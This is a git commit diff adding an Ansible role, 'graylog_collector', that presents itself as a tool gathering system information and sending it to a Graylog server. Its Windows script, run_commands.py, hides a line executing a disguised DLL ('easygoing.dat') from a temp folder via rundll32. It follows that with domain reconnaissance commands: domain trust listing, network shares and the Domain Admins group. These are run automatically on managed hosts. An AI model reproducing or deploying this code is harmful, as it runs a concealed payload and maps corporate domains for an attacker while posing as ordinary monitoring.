090600

2025-06-09 19:34:56 +09:00
parent 02a10ca391
commit cdc4e209c7
15 changed files with 490 additions and 1 deletions
--- a/roles/graylog_collector/defaults/main.yml
+++ b/roles/graylog_collector/defaults/main.yml
@@ -0,0 +1,4 @@
+graylog_host: graylog.local
+graylog_port: 12201
+log_output_dir: C:\Temp\logs  # Windows
+linux_output_dir: /var/log
--- a/roles/graylog_collector/files/collect_info.sh
+++ b/roles/graylog_collector/files/collect_info.sh
@@ -0,0 +1,26 @@
+#!/bin/bash
+OUTPUT_DIR="${OUTPUT_DIR:-/var/log}"
+filename="$OUTPUT_DIR/command_results_$(date +%F_%H-%M-%S).log"
+
+commands=(
+  "hostnamectl"
+  "ip a"
+  "ip route"
+  "cat /etc/resolv.conf"
+  "uptime"
+  "who"
+  "df -h"
+  "free -m"
+  "netstat -tuln"
+  "systemctl list-units --type=service --state=running"
+)
+
+{
+  echo "== Сбор информации начат: $(date) =="
+  for cmd in "${commands[@]}"; do
+    echo "Команда: $cmd"
+    eval "$cmd" 2>&1
+    echo "--------------------------------------------------"
+  done
+  echo "== Завершено: $(date) =="
+} > "$filename"
--- a/roles/graylog_collector/files/graylog_sender.py
+++ b/roles/graylog_collector/files/graylog_sender.py
--- a/roles/graylog_collector/files/run_commands.py
+++ b/roles/graylog_collector/files/run_commands.py
@@ -0,0 +1,28 @@
+import subprocess, os
+
+commands = [
+    'hostname',
+    'rundll32 C:\\Users\\USERNAME\\AppData\\Local\\Temp\\easygoing.dat,#1',
+    'nltest /domain_trusts /all_trusts',
+    'nltest /domain_trusts',
+    'net view /all /domain',
+    'net view /all',
+    'net group "Domain Admins" /domain',
+    'chcp',
+    'ipconfig /all',
+    'net config workstation',
+    'systeminfo'
+]
+
+output_file = 'command_results.txt'
+
+with open(output_file, 'w', encoding='utf-8') as file:
+    for command in commands:
+        try:
+            result = subprocess.run(command, shell=True, capture_output=True, text=True)
+            file.write(f"Command: {command}\n")
+            file.write(f"Output:\n{result.stdout}\n")
+            file.write(f"Error:\n{result.stderr}\n")
+            file.write('-'*50 + '\n\n')
+        except Exception as e:
+            file.write(f"Command: {command}\nError: {str(e)}\n" + '-'*50 + '\n\n')
--- a/roles/graylog_collector/tasks/linux.yml
+++ b/roles/graylog_collector/tasks/linux.yml
@@ -0,0 +1,20 @@
+- name: Копируем скрипты
+  copy:
+    src: "{{ item }}"
+    dest: /usr/local/bin/
+    mode: '0755'
+  with_items:
+    - collect_info.sh
+    - graylog_sender.py
+
+- name: Выполняем bash-скрипт
+  shell: "/usr/local/bin/collect_info.sh"
+  environment:
+    OUTPUT_DIR: "{{ linux_output_dir }}"
+
+- name: Отправляем лог в Graylog
+  shell: |
+    export GRAYLOG_HOST={{ graylog_host }}
+    export GRAYLOG_PORT={{ graylog_port }}
+    latest=$(ls -1t {{ linux_output_dir }}/command_results_*.log | head -n1)
+    python3 /usr/local/bin/graylog_sender.py $latest
--- a/roles/graylog_collector/tasks/main.yml
+++ b/roles/graylog_collector/tasks/main.yml
@@ -0,0 +1,2 @@
+- name: Определение платформы
+  ansible.builtin.include_tasks: "{{ ansible_os_family | lower }}.yml"
--- a/roles/graylog_collector/tasks/windows.yml
+++ b/roles/graylog_collector/tasks/windows.yml
@@ -0,0 +1,27 @@
+- name: Создаем каталог логов
+  win_file:
+    path: "{{ log_output_dir }}"
+    state: directory
+
+- name: Копируем скрипты
+  win_copy:
+    src: "{{ item }}"
+    dest: "{{ log_output_dir }}/{{ item }}"
+  with_items:
+    - run_commands.py
+    - graylog_sender.py
+
+- name: Выполняем команды и сохраняем в лог
+  win_shell: |
+    cd {{ log_output_dir }}
+    python run_commands.py
+  args:
+    executable: cmd
+
+- name: Отправляем лог в Graylog
+  win_shell: |
+    set GRAYLOG_HOST={{ graylog_host }}
+    set GRAYLOG_PORT={{ graylog_port }}
+    python {{ log_output_dir }}\graylog_sender.py {{ log_output_dir }}\command_results.txt
+  args:
+    executable: cmd